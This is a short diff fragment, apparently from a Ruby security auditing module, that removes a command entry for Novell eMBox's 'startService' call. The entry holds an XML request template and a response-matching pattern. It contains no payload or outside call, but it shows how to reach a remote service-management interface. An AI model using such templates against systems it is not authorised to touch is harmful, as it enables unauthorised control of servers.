- 'CMD' => 'novell.embox.service.startService',
- 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
- 'PARAM' => '<Parameters>' +
- '<params xmlns:DSService="service.dtd">' +
- '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
- '</params></Parameters>',
- 'USE_PARAM' => true
- }
- ],
- [